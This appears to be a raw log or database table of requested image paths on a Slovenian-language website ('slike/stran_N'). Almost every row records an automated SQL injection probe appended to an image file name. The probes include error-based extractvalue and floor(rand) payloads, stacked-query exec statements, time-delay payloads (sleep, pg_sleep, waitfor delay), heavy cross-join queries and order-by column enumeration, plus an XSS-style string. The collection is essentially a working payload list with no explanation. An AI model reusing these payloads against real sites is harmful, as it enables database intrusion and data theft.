1400. | 1 | balance.gif' procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and 'bqri' like 'bqri //slike//stran_1/balance.gif' procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and 'bqri' like 'bqri |
1401. | 1 | balance.gif") procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ("ovks"="ovks //slike//stran_1/balance.gif") procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and ("ovks"="ovks |
1402. | 1 | balance.gif" procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and "rzgh"="rzgh //slike//stran_1/balance.gif" procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1) and "rzgh"="rzgh |
1403. | 1 | balance.gif procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1)-- iawp //slike//stran_1/balance.gif procedure analyse(extractvalue(5103,concat(0x5c,0x7171707671,(select (case when (5103=5103) then 1 else 0 end)),0x7170767871)),1)-- iawp |
1404. | 1 | (select 8741 from(select count(*),concat(0x7171707671,(select (elt(8741=8741,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) //slike//stran_1/(select 8741 from(select count(*),concat(0x7171707671,(select (elt(8741=8741,1))),0x7170767871,floor(rand(0)*2))x from information_schema.plugins group by x)a) |
1405. | 1 | balance.gif,(select 5181 from (select row(5181,1545)>(select count(*),concat(0x7171707671,(select (elt(5181=5181,1))),0x7170767871,floor(rand(0)*2))x from (select 4631 union select 6526 union select 7140 union select 2738)a group by x))s) //slike//stran_1/balance.gif,(select 5181 from (select row(5181,1545)>(select count(*),concat(0x7171707671,(select (elt(5181=5181,1))),0x7170767871,floor(rand(0)*2))x from (select 4631 union select 6526 union select 7140 union select 2738)a group by x))s) |
1406. | 1 | balance.gif);declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif);declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1407. | 1 | balance.gif));declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif));declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1408. | 1 | balance.gif;declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif;declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1409. | 1 | balance.gif');declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif');declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1410. | 1 | balance.gif'));declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif'));declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1411. | 1 | balance.gif';declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif';declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1412. | 1 | balance.gif%';declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif%';declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1413. | 1 | balance.gif");declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif");declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1414. | 1 | balance.gif";declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- //slike//stran_1/balance.gif";declare @yunq nvarchar(4000);set @yunq=(select 'qqpvq'+(select (case when (3670=3670) then '1' else '0' end))+'qpvxq');exec @yunq-- |
1415. | 1 | (select concat(concat('qqpvq',(case when (2488=2488) then '1' else '0' end)),'qpvxq')) //slike//stran_1/(select concat(concat('qqpvq',(case when (2488=2488) then '1' else '0' end)),'qpvxq')) |
1416. | 1 | (select concat(0x7171707671,(elt(7862=7862,1)),0x7170767871)) //slike//stran_1/(select concat(0x7171707671,(elt(7862=7862,1)),0x7170767871)) |
1417. | 1 | (select char(113)+char(113)+char(112)+char(118)+char(113)+(case when (7734=7734) then char(49) else char(48) end)+char(113)+char(112)+char(118)+char(120)+char(113)) //slike//stran_1/(select char(113)+char(113)+char(112)+char(118)+char(113)+(case when (7734=7734) then char(49) else char(48) end)+char(113)+char(112)+char(118)+char(120)+char(113)) |
1418. | 1 | balance.gif);select sleep(32)# //slike//stran_1/balance.gif);select sleep(32)# |
1419. | 1 | balance.gif));select sleep(32)# //slike//stran_1/balance.gif));select sleep(32)# |
1420. | 1 | balance.gif;select sleep(32)# //slike//stran_1/balance.gif;select sleep(32)# |
1421. | 1 | balance.gif');select sleep(32)# //slike//stran_1/balance.gif');select sleep(32)# |
1422. | 1 | balance.gif'));select sleep(32)# //slike//stran_1/balance.gif'));select sleep(32)# |
1423. | 1 | balance.gif';select sleep(32)# //slike//stran_1/balance.gif';select sleep(32)# |
1424. | 1 | balance.gif%';select sleep(32)# //slike//stran_1/balance.gif%';select sleep(32)# |
1425. | 1 | balance.gif");select sleep(32)# //slike//stran_1/balance.gif");select sleep(32)# |
1426. | 1 | balance.gif";select sleep(32)# //slike//stran_1/balance.gif";select sleep(32)# |
1427. | 1 | balance.gif);select pg_sleep(32)-- //slike//stran_1/balance.gif);select pg_sleep(32)-- |
1428. | 1 | balance.gif));select pg_sleep(32)-- //slike//stran_1/balance.gif));select pg_sleep(32)-- |
1429. | 1 | balance.gif;select pg_sleep(32)-- //slike//stran_1/balance.gif;select pg_sleep(32)-- |
1430. | 1 | balance.gif');select pg_sleep(32)-- //slike//stran_1/balance.gif');select pg_sleep(32)-- |
1431. | 1 | balance.gif'));select pg_sleep(32)-- //slike//stran_1/balance.gif'));select pg_sleep(32)-- |
1432. | 1 | balance.gif';select pg_sleep(32)-- //slike//stran_1/balance.gif';select pg_sleep(32)-- |
1433. | 1 | balance.gif%';select pg_sleep(32)-- //slike//stran_1/balance.gif%';select pg_sleep(32)-- |
1434. | 1 | balance.gif");select pg_sleep(32)-- //slike//stran_1/balance.gif");select pg_sleep(32)-- |
1435. | 1 | balance.gif";select pg_sleep(32)-- //slike//stran_1/balance.gif";select pg_sleep(32)-- |
1436. | 1 | balance.gif);select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif);select count(*) from generate_series(1,32000000)-- |
1437. | 1 | balance.gif));select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif));select count(*) from generate_series(1,32000000)-- |
1438. | 1 | balance.gif;select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif;select count(*) from generate_series(1,32000000)-- |
1439. | 1 | balance.gif');select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif');select count(*) from generate_series(1,32000000)-- |
1440. | 1 | balance.gif'));select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif'));select count(*) from generate_series(1,32000000)-- |
1441. | 1 | balance.gif';select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif';select count(*) from generate_series(1,32000000)-- |
1442. | 1 | balance.gif%';select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif%';select count(*) from generate_series(1,32000000)-- |
1443. | 1 | balance.gif");select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif");select count(*) from generate_series(1,32000000)-- |
1444. | 1 | balance.gif";select count(*) from generate_series(1,32000000)-- //slike//stran_1/balance.gif";select count(*) from generate_series(1,32000000)-- |
1445. | 1 | balance.gif);waitfor delay '0:0:32'-- //slike//stran_1/balance.gif);waitfor delay '0:0:32'-- |
1446. | 1 | balance.gif));waitfor delay '0:0:32'-- //slike//stran_1/balance.gif));waitfor delay '0:0:32'-- |
1447. | 1 | balance.gif;waitfor delay '0:0:32'-- //slike//stran_1/balance.gif;waitfor delay '0:0:32'-- |
1448. | 1 | balance.gif');waitfor delay '0:0:32'-- //slike//stran_1/balance.gif');waitfor delay '0:0:32'-- |
1449. | 1 | balance.gif'));waitfor delay '0:0:32'-- //slike//stran_1/balance.gif'));waitfor delay '0:0:32'-- |
1450. | 1 | balance.gif';waitfor delay '0:0:32'-- //slike//stran_1/balance.gif';waitfor delay '0:0:32'-- |
1451. | 1 | balance.gif%';waitfor delay '0:0:32'-- //slike//stran_1/balance.gif%';waitfor delay '0:0:32'-- |
1452. | 1 | balance.gif");waitfor delay '0:0:32'-- //slike//stran_1/balance.gif");waitfor delay '0:0:32'-- |
1453. | 1 | balance.gif";waitfor delay '0:0:32'-- //slike//stran_1/balance.gif";waitfor delay '0:0:32'-- |
1454. | 1 | balance.gif);declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif);declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1455. | 1 | balance.gif));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1456. | 1 | balance.gif;declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif;declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1457. | 1 | balance.gif');declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif');declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1458. | 1 | balance.gif'));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif'));declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1459. | 1 | balance.gif';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1460. | 1 | balance.gif%';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif%';declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1461. | 1 | balance.gif");declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif");declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1462. | 1 | balance.gif";declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- //slike//stran_1/balance.gif";declare @x char(9);set @x=0x303a303a332;waitfor delay @x-- |
1463. | 1 | balance.gif);select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif);select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1464. | 1 | balance.gif));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1465. | 1 | balance.gif;select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif;select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1466. | 1 | balance.gif');select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif');select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1467. | 1 | balance.gif'));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif'));select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1468. | 1 | balance.gif';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1469. | 1 | balance.gif%';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif%';select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1470. | 1 | balance.gif");select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif");select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1471. | 1 | balance.gif";select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- //slike//stran_1/balance.gif";select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5-- |
1472. | 1 | balance.gif) order by 1-- nmij //slike//stran_1/balance.gif) order by 1-- nmij |
1473. | 1 | balance.gif) order by 3631-- sfvd //slike//stran_1/balance.gif) order by 3631-- sfvd |
1474. | 1 | balance.gif)) order by 1-- yljo //slike//stran_1/balance.gif)) order by 1-- yljo |
1475. | 1 | balance.gif)) order by 7203-- oiun //slike//stran_1/balance.gif)) order by 7203-- oiun |
1476. | 1 | balance.gif') order by 1-- hxhj //slike//stran_1/balance.gif') order by 1-- hxhj |
1477. | 1 | balance.gif') order by 5745-- vbtq //slike//stran_1/balance.gif') order by 5745-- vbtq |
1478. | 1 | balance.gif')) order by 1-- rapi //slike//stran_1/balance.gif')) order by 1-- rapi |
1479. | 1 | balance.gif')) order by 3329-- tmwr //slike//stran_1/balance.gif')) order by 3329-- tmwr |
1480. | 1 | balance.gif' order by 1-- juwx //slike//stran_1/balance.gif' order by 1-- juwx |
1481. | 1 | balance.gif' order by 9899-- upuy //slike//stran_1/balance.gif' order by 9899-- upuy |
1482. | 1 | balance.gif') order by 1-- udkv //slike//stran_1/balance.gif') order by 1-- udkv |
1483. | 1 | balance.gif') order by 3981-- qmmt //slike//stran_1/balance.gif') order by 3981-- qmmt |
1484. | 1 | balance.gif%' order by 1-- chej //slike//stran_1/balance.gif%' order by 1-- chej |
1485. | 1 | balance.gif%' order by 2339-- xbcr //slike//stran_1/balance.gif%' order by 2339-- xbcr |
1486. | 1 | balance.gif' order by 1-- qaxv //slike//stran_1/balance.gif' order by 1-- qaxv |
1487. | 1 | balance.gif' order by 2113-- qpnp //slike//stran_1/balance.gif' order by 2113-- qpnp |
1488. | 1 | balance.gif") order by 1-- kpbv //slike//stran_1/balance.gif") order by 1-- kpbv |
1489. | 1 | balance.gif") order by 4335-- staa //slike//stran_1/balance.gif") order by 4335-- staa |
1490. | 1 | balance.gif" order by 1-- itkd //slike//stran_1/balance.gif" order by 1-- itkd |
1491. | 1 | balance.gif" order by 6162-- mwfi //slike//stran_1/balance.gif" order by 6162-- mwfi |
1492. | 1 | balance.gif) order by 1# //slike//stran_1/balance.gif) order by 1# |
1493. | 1 | balance.gif) order by 7890# //slike//stran_1/balance.gif) order by 7890# |
1494. | 1 | balance.gif)) order by 1# //slike//stran_1/balance.gif)) order by 1# |
1495. | 1 | balance.gif)) order by 2986# //slike//stran_1/balance.gif)) order by 2986# |
1496. | 1 | balance.gif order by 1246# //slike//stran_1/balance.gif order by 1246# |
1497. | 1 | balance.gif') order by 2955# //slike//stran_1/balance.gif') order by 2955# |
1498. | 1 | balance.gif')) order by 1# //slike//stran_1/balance.gif')) order by 1# |
1499. | 1 | balance.gif')) order by 9266# //slike//stran_1/balance.gif')) order by 9266# |
1500. | 1 | balance.gif' order by 3488# //slike//stran_1/balance.gif' order by 3488# |
1501. | 1 | balance.gif') order by 7553# //slike//stran_1/balance.gif') order by 7553# |
1502. | 1 | balance.gif%' order by 1# //slike//stran_1/balance.gif%' order by 1# |
1503. | 1 | balance.gif%' order by 7474# //slike//stran_1/balance.gif%' order by 7474# |
1504. | 1 | balance.gif' order by 6092# //slike//stran_1/balance.gif' order by 6092# |
1505. | 1 | balance.gif") order by 1# //slike//stran_1/balance.gif") order by 1# |
1506. | 1 | balance.gif") order by 2761# //slike//stran_1/balance.gif") order by 2761# |
1507. | 1 | balance.gif" order by 1# //slike//stran_1/balance.gif" order by 1# |
1508. | 1 | balance.gif" order by 4899# //slike//stran_1/balance.gif" order by 4899# |
1509. | 1 | balance.gif order by 1154# //slike//stran_1/balance.gif order by 1154# |
1510. | 1 | baby-net.gif //slike//stran_1'/baby-net.gif |
1511. | 1 | baby-net.gif' //slike//stran_1/baby-net.gif' |
1512. | 1 | flight.jpg //slike//stran_1'/flight.jpg |
1513. | 1 | flight.jpg' //slike//stran_1/flight.jpg' |
1514. | 1 | work.jpg //slike//stran_2'/work.jpg |
1515. | 1 | work.jpg' //slike//stran_2/work.jpg' |
1516. | 1 | moto-man.jpg //slike//stran_3'/moto-man.jpg |
1517. | 1 | moto-man.jpg' //slike//stran_3/moto-man.jpg' |
1518. | 1 | zebra.gif //slike//stran_2'/zebra.gif |
1519. | 1 | zebra.gif' //slike//stran_2/zebra.gif' |
1520. | 1 | nintendo.jpg //slike//stran_3'/nintendo.jpg |
1521. | 1 | nintendo.jpg' //slike//stran_3/nintendo.jpg' |
1522. | 1 | tup.gif //slike//stran_4'/tup.gif |
1523. | 1 | tup.gif' //slike//stran_4/tup.gif' |
1524. | 1 | direktor.gif //slike//stran_3'[0]/direktor.gif |
1525. | 1 | direktor.gif'[0] //slike//stran_3/direktor.gif'[0] |
1526. | 1 | " //slike//stran_3/" |
1527. | 1 | balance.gif order by 1 //slike//stran_1/balance.gif order by 1 |
1528. | 1 | balance.gif;waitfor delay //slike//stran_1/balance.gif;waitfor delay |
1529. | 1 | //slike//stran_1;WAITFOR DELAY / |
1530. | 1 | -1538 or 3085 //slike//stran_1/-1538 or 3085 |
1531. | 1 | balance.gif and 4517 //slike//stran_1/balance.gif and 4517 |
1532. | 1 | balance.gif //slike//stran_-3033 OR 2728/balance.gif |
1533. | 1 | balance.gif and 7606 //slike//stran_1/balance.gif and 7606 |
1534. | 1 | balance.gif //slike//stran_-4684 OR 5672/balance.gif |
1535. | 1 | (select concat(concat( //slike//stran_1/(select concat(concat( |
1536. | 1 | balance.gif order by 1246 //slike//stran_1/balance.gif order by 1246 |
1537. | 1 | balance.gif //slike//stran_-1402 OR 3784/balance.gif |
1538. | 1 | //slike//stran_(SELECT CONCAT(CONCAT(/ |
1539. | 1 | balance.gif //slike//stran_1 AND 7808/balance.gif |
1540. | 1 | balance.gif order by 1154 //slike//stran_1/balance.gif order by 1154 |
1541. | 1 | //slike//stran_1 ORDER BY 2149/ |
1542. | 1 | prepovedano.gif //slike//stran_5...).,.'"(/prepovedano.gif |
1543. | 1 | QjpIyr&file=prepovedano.gif','','scrollbars=1,resizable=1');">prepovedano.gif //slike//stran_5'PvGxTO<'">QjpIyr/prepovedano.gif |
1544. | 1 | prepovedano.gif //slike//stran_5) AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (4821=4821/prepovedano.gif |
1545. | 1 | prepovedano.gif //slike//stran_5)) AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ((6438=6438/prepovedano.gif |
1546. | 1 | prepovedano.gif //slike//stran_5 AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)/prepovedano.gif |
1547. | 1 | prepovedano.gif //slike//stran_5 AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- XrUD/prepovedano.gif |
1548. | 1 | prepovedano.gif //slike//stran_5') AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('LOhY'='LOhY/prepovedano.gif |
1549. | 1 | prepovedano.gif //slike//stran_5')) AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND (('iqYP'='iqYP/prepovedano.gif |
1550. | 1 | prepovedano.gif //slike//stran_5' AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'DcGh'='DcGh/prepovedano.gif |
1551. | 1 | prepovedano.gif //slike//stran_5') AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('yoPA' LIKE 'yoPA/prepovedano.gif |
1552. | 1 | prepovedano.gif //slike//stran_5%' AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Rfsw%'='Rfsw/prepovedano.gif |
1553. | 1 | prepovedano.gif //slike//stran_5' AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'AmCU' LIKE 'AmCU/prepovedano.gif |
1554. | 1 | prepovedano.gif //slike//stran_5") AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ("PchP"="PchP/prepovedano.gif |
1555. | 1 | prepovedano.gif //slike//stran_5" AND (SELECT 9345 FROM(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(9345=9345,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "kTtm"="kTtm/prepovedano.gif |
1556. | 1 | prepovedano.gif //slike//stran_5) AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND (5295=5295/prepovedano.gif |
1557. | 1 | prepovedano.gif //slike//stran_5)) AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND ((3321=3321/prepovedano.gif |
1558. | 1 | prepovedano.gif //slike//stran_5 AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071))/prepovedano.gif |
1559. | 1 | prepovedano.gif //slike//stran_5 AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071))-- TFxu/prepovedano.gif |
1560. | 1 | prepovedano.gif //slike//stran_5') AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND ('KpOW'='KpOW/prepovedano.gif |
1561. | 1 | prepovedano.gif //slike//stran_5')) AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND (('Drzr'='Drzr/prepovedano.gif |
1562. | 1 | prepovedano.gif //slike//stran_5' AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND 'XVlK'='XVlK/prepovedano.gif |
1563. | 1 | prepovedano.gif //slike//stran_5') AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND ('mlgQ' LIKE 'mlgQ/prepovedano.gif |
1564. | 1 | prepovedano.gif //slike//stran_5%' AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND 'QBPS%'='QBPS/prepovedano.gif |
1565. | 1 | prepovedano.gif //slike//stran_5' AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND 'PUEP' LIKE 'PUEP/prepovedano.gif |
1566. | 1 | prepovedano.gif //slike//stran_5") AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND ("Armx"="Armx/prepovedano.gif |
1567. | 1 | prepovedano.gif //slike//stran_5" AND EXTRACTVALUE(7501,CONCAT(0x5c,0x71766a7671,(SELECT (ELT(7501=7501,1))),0x71626b7071)) AND "qUlr"="qUlr/prepovedano.gif |
1568. | 1 | prepovedano.gif //slike//stran_5) AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND (4452=4452/prepovedano.gif |
1569. | 1 | prepovedano.gif //slike//stran_5)) AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND ((1732=1732/prepovedano.gif |
1570. | 1 | prepovedano.gif //slike//stran_5 AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x)/prepovedano.gif |
1571. | 1 | prepovedano.gif //slike//stran_5 AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x)-- SNWX/prepovedano.gif |
1572. | 1 | prepovedano.gif //slike//stran_5') AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND ('ApXw'='ApXw/prepovedano.gif |
1573. | 1 | prepovedano.gif //slike//stran_5')) AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND (('gRib'='gRib/prepovedano.gif |
1574. | 1 | prepovedano.gif //slike//stran_5' AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND 'lYmH'='lYmH/prepovedano.gif |
1575. | 1 | prepovedano.gif //slike//stran_5') AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND ('qCnK' LIKE 'qCnK/prepovedano.gif |
1576. | 1 | prepovedano.gif //slike//stran_5%' AND ROW(3219,9961)>(SELECT COUNT(*),CONCAT(0x71766a7671,(SELECT (ELT(3219=3219,1))),0x71626b7071,FLOOR(RAND(0)*2))x FROM (SELECT 7037 UNION SELECT 7712 UNION SELECT 8721 UNION SELECT 9490)a GROUP BY x) AND 'LAri%'='LAri/prepovedano.gif |
